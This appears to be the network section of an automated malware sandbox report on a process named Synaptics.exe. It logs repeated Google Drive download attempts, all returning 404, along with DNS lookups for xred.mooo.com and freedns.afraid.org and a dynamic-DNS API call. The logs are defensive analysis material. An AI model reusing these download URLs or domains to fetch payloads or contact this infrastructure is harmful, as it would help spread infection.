Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache

Source: Synaptics.exe, 00000006.00000003.1392959426.000000000570D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .google.com.appengine.google.com.bdn.dev.origin-test.bdn.dev.cloud.google.com.crowdsource.google.com.datacompute.google.com.google.ca.google.cl.google.co.in.google.co.jp.google.co.uk.google.com.ar.google.com.au.google.com.br.google.com.co.google.com.mx.google.com.tr.google.com.vn.google.de.google.es.google.fr.google.hu.google.it.google.nl.google.pl.google.pt.googleapis.cn.googlevideo.com.gstatic.cn.gstatic-cn.comgooglecnapps.cn.googlecnapps.cngoogleapps-cn.com.googleapps-cn.comgkecnapps.cn.gkecnapps.cngoogledownloads.cn.googledownloads.cnrecaptcha.net.cn.recaptcha.net.cnrecaptcha-cn.net.recaptcha-cn.netwidevine.cn.widevine.cnampproject.org.cn.ampproject.org.cnampproject.net.cn.ampproject.net.cngoogle-analytics-cn.com.google-analytics-cn.comgoogleadservices-cn.com.googleadservices-cn.comgooglevads-cn.com.googlevads-cn.comgoogleapis-cn.com.googleapis-cn.comgoogleoptimize-cn.com.googleoptimize-cn.comdoubleclick-cn.net.doubleclick-cn.net.fls.doubleclick-cn.net.g.doubleclick-cn.netdoubleclick.cn.doubleclick.cn.fls.doubleclick.cn.g.doubleclick.cndartsearch-cn.net.dartsearch-cn.netgoogletraveladservices-cn.com.googletraveladservices-cn.comgoogletagservices-cn.com.googletagservices-cn.comgoogletagmanager-cn.com.googletagmanager-cn.comgooglesyndication-cn.com.googlesyndication-cn.com.safeframe.googlesyndication-cn.comapp-measurement-cn.com.app-measurement-cn.comgvt1-cn.com.gvt1-cn.comgvt2-cn.com.gvt2-cn.com2mdn-cn.net.2mdn-cn.netgoogleflights-cn.net.googleflights-cn.netadmob-cn.com.admob-cn.comgooglesandbox-cn.com.googlesandbox-cn.com.safenup.googlesandbox-cn.com.gstatic.com.metric.gstatic.com.gvt1.com.gcpcdn.gvt1.com.gvt2.com.gcp.gvt2.com.url.google.com.youtube-nocookie.com.ytimg.comandroid.com.android.com.flash.android.comg.cn.g.cng.co.g.cogoo.glwww.goo.glgoogle-analytics.com.google-analytics.comgoogle.comgooglecommerce.com.googlecommerce.comggpht.cn.ggpht.cnurchin.com.urchin.comyoutu.beyoutube.com.youtube.commusic.youtube.com.music.youtube.comyoutubeeducation.com.youtubeeducation.comyoutubekids.com.youtubekids.comyt.be.yt.beandroid.clients.google.com.android.google.cn.chrome.google.cn.developers.google.cn equals www.youtube.com (Youtube)
Source: Synaptics.exe, 00000006.00000003.1392959426.000000000570D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ads.cn.googledownloads.cnrecaptcha.net.cn.recaptcha.net.cnrecaptcha-cn.net.recaptcha-cn.netwidevine.cn.widevine.cnampproject.org.cn.ampproject.org.cnampproject.net.cn.ampproject.net.cngoogle-analytics-cn.com.google-analytics-cn.comgoogleadservices-cn.com.googleadservices-cn.comgooglevads-cn.com.googlevads-cn.comgoogleapis-cn.com.googleapis-cn.comgoogleoptimize-cn.com.googleoptimize-cn.comdoubleclick-cn.net.doubleclick-cn.net.fls.doubleclick-cn.net.g.doubleclick-cn.netdoubleclick.cn.doubleclick.cn.fls.doubleclick.cn.g.doubleclick.cndartsearch-cn.net.dartsearch-cn.netgoogletraveladservices-cn.com.googletraveladservices-cn.comgoogletagservices-cn.com.googletagservices-cn.comgoogletagmanager-cn.com.googletagmanager-cn.comgooglesyndication-cn.com.googlesyndication-cn.com.safeframe.googlesyndication-cn.comapp-measurement-cn.com.app-measurement-cn.comgvt1-cn.com.gvt1-cn.comgvt2-cn.com.gvt2-cn.com2mdn-cn.net.2mdn-cn.netgoogleflights-cn.net.googleflights-cn.netadmob-cn.com.admob-cn.comgooglesandbox-cn.com.googlesandbox-cn.com.safenup.googlesandbox-cn.com.gstatic.com.metric.gstatic.com.gvt1.com.gcpcdn.gvt1.com.gvt2.com.gcp.gvt2.com.url.google.com.youtube-nocookie.com.ytimg.comandroid.com.android.com.flash.android.comg.cn.g.cng.co.g.cogoo.glwww.goo.glgoogle-analytics.com.google-analytics.comgoogle.comgooglecommerce.com.googlecommerce.comggpht.cn.ggpht.cnurchin.com.urchin.comyoutu.beyoutube.com.youtube.commusic.youtube.com.music.youtube.comyoutubeeducation.com.youtubeeducation.comyoutubekids.com.youtubekids.comyt.be.yt.beandroid.clients.google.com.android.google.cn.chrome.google.cn.developers.google.cn equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: docs.google.com
Source: global traffic	DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic	DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5fKeLq9tTz_VBV69ykp_jYlg6_xgkEnw8DFu_9Yw7-aQHEViecQ9ryrHUq1L-uzSXMQDC2fbIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:25 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-If7EhUa8VTraOH3ed7pO8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=IZV7_MT29K_cxs0Nlxc8NrQsu7GIabYRwvAYyyBEG0ekIEnUSL5dRTn9BoOc-2RMuqJinZhHwWGgvZReah0g78tv1ceI0jq0HZXyS5oixjt6ZrbYAYJwUDrxT-ajTd35EtLwyGXMjw0vaJ5SzWgtRWzcs5Kh7ukp3PtC3WuA9LpqEwgbrEBxGgmG; expires=Tue, 01-Jul-2025 10:41:25 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7iMyOfv-K1V_0Cm8o0F1Vkhmx78RyT2yrxBWqydySKXHchDXMwFDAJ6PmPJrT9162TContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:25 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-RWkKHWRb0sL6qy8gXpX19Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD; expires=Tue, 01-Jul-2025 10:41:25 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7wy6HR7Nc9loz5iUJx7QL3OJmdpZp060KG8u8O2rIrMQVzOILdT69aMMttQ5wWQRoBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:26 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-dwYEZN59J6peHOPxTTVhjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw; expires=Tue, 01-Jul-2025 10:41:26 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC701F9UKC31NbXhCt5h4gn1h46Pf4ssumseb-0tq_OY5tsRWKqkUYIWbcy8fnFtf3M2SWx4M1UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:27 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-eqd55webRQyrsVmaBKBDNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP; expires=Tue, 01-Jul-2025 10:41:27 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
